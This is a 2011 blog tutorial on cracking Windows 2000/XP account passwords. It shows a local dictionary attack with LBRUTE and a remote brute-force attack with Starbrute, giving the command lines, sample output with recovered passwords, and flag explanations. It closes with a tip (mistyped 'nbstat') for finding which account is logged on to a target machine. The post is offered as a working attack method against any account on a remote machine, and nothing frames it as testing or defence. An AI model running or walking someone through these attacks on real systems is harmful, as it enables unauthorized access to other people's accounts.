Saturday, 18 June 2011

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally.. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar < warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account your trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password. Meaning it will use Charset:1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:192.168.0.3
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine your trying to get the account password from.

guest is the account name your trying to crack

3 is start lenght of the password

4 is the maximum lenght of the password

high means the program will use alot of resources - the higher the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this command into CMD: nbstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.

0 comments:

Post a comment